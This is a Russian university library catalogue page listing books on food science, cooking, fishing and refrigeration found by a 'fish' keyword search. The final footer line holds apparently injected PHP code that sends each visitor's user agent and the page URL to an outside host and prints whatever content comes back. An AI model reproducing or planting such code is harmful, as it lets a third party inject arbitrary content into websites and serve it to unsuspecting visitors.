Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

59 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РЫБА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 211
1. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

2. 
Справочник кадровика [Текст]. Т. 5 : Профессии рабочих ЕТКСВып. 1, 50, 52, 2002. - 365 с.
Держатели документа (Информация об экземплярах) 
3. 
Фурс, Иван Николаевич. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности "Коммерческая деятельность" / И. Н. Фурс, 2002. - 798 с.
Держатели документа (Информация об экземплярах) 

Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.

4. 
Энциклопедия для детей [Текст] / Гл. ред. М. Д. Аксенова. Т. 2 : Биология, 2002. - 699, [3] с.
Держатели документа (Информация об экземплярах) 
5. 
Ловись, рыбка [Текст], 1994. - 278, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Мещеряков, Александр Николаевич. Книга японских символов [Текст], 2004. - 556 с.
Оглавление 
  • Мещеряков, Александр Николаевич. Книга японских обыкновений / А. Н. Мещеряков
Держатели документа (Информация об экземплярах) 
7. 
Красная книга Омской области [Текст] : животные, растения, лишайники / Правительство Ом. обл., М-во пром. политики, транспорта и связи Ом. обл., 2005. - 459, [1] с.
8. 
Шатун, Любовь Григорьевна. Технология приготовления пищи [Текст] : учеб. / Л. Г. Шатун, 2006. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник соответствует государственному общеобразовательному стандарту и дает необходимые представления по теории <механической> и <тепловой> обработки <продуктов>, расчетам сырья и <потерь> при обработке, технологии приготовления пищи с демонстрацией технологических карт и схем. ПРиведены многочисленные <кулинарные> <рецепты>.

Даны рекомендации по работе с нормативно-технологической документацией, составлению <меню>, <лечебному> <питанию>.

Для контроля знаний предложены контрольные измерители.

9. 
Коновалов, Валентин Львович. Холодильное оборудование промысловых судов [Текст] / В. Л. Коновалов, Н. А. Смелков, 1990. - 144 с.
Держатели документа (Информация об экземплярах) 
10. 
Похлебкин, Вильям Васильевич. Национальные кухни наших народов [Текст] / В. В. Похлебкин, 2001. - 638, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
11. 
Секреты рыболовства [Текст] / сост. : Ю. А. Новик, 1998. - 671 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
12. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
13. 
Киселева, Вера Борисовна. Детская кухня [Текст] : Кн. для матерей о приготовлении пищи детям / В. Б. Киселева; В. С. Вайль, 1958. - 175 с.
Держатели документа (Информация об экземплярах) 
14. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Норматив. док. для предприятий обществ. питания / А. В. Румянцев, 1998. - 863 с.
Держатели документа (Информация об экземплярах) 
15. 
Сборник примеров расчетов и лабораторных работ по курсу "Холодильное технологическое оборудование" [Текст] : Учеб. пособие для вузов / М. М. Голянд, Б. Н. Малеванный, М. З. Печатников, В. Т. Плотников, 1981. - 166 с.
Держатели документа (Информация об экземплярах) 
16. 
Товароведение продовольственных товаров [Текст] : Конспект лекций / М. Бурова, 2000. - 142 с.
17. 
Джонсон, Джинни. Тайны жизни животных [Текст] / Д. Джонсон ; пер. С. Н. Анисимов, 2000. - 263 с.
18. 
Консервы, пресервы из рыбы и морепродуктов [Текст] : Термины и определения, 1998. - 4 с.
Держатели документа (Информация об экземплярах) 
19. 
Кругляков, Геннадий Николаевич. Товароведение продовольственных товаров [Текст] : Учеб. / Г. Н. Кругляков, Г. В. Круглякова, 2000. - 447 с.
20. 
Аквариумные тропические рыбы [Текст] / под ред. А. В. Неелова, 1984. - 224 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2907 - 26.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.04 с.12 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;